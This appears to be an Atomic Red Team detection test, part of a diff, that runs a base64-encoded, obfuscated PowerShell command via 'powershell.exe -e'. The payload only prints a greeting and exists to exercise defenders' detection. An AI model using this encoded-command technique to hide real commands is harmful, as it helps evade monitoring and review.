+ +## Atomic Test #19 - PowerShell Command Execution +Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** a538de64-1c74-46ed-aa60-b995ed302598 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| obfuscated_code | Defaults to: Invoke-Expression with a "Write-Host" line. | string | JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +powershell.exe -e #{obfuscated_code} +``` + + + + + +